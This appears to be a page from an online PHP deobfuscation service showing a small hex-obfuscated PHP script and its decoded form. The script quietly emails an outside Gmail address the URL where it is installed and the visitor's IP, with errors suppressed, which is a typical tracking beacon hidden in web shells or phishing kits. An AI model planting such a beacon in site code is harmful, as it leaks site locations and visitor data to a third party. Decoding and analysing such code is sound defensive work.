Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php set_time_limit(0); ini_set('memory_limit', '-1'); @ini_set('output_buffering', 0)..

Decoded Output download

<?php 
set_time_limit(0); 
ini_set('memory_limit', '-1'); 
@ini_set('output_buffering', 0); 
@ini_set('display_errors', 0); 
header('Content-Type: text/html; 
 charset=UTF-8'); 
$main = "[email protected]"; 
$now = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; 
$notif = "$now"; 
@mail($main, "Ding Dong ", $notif, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); 
 
?>

Did this file decode correctly?

Original Code

<?php
set_time_limit(0);
ini_set('memory_limit', '-1');
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
header('Content-Type: text/html;
 charset=UTF-8');
$main = "\x69\x6e\x62\x6f\x78\x6e\x6f\x74\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x6f\x77\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d";
$now = "\x68\x74\x74\x70\x3a\x2f\x2f" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$notif = "$now";
@mail($main, "Ding Dong ", $notif, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

?>

Function Calls

header 1
ini_set 3
set_time_limit 1

Variables

None

Stats

MD5 e16fbb6ccb0e1fb4e956ab1d1b8cc19f
Eval Count 0
Decode Time 59 ms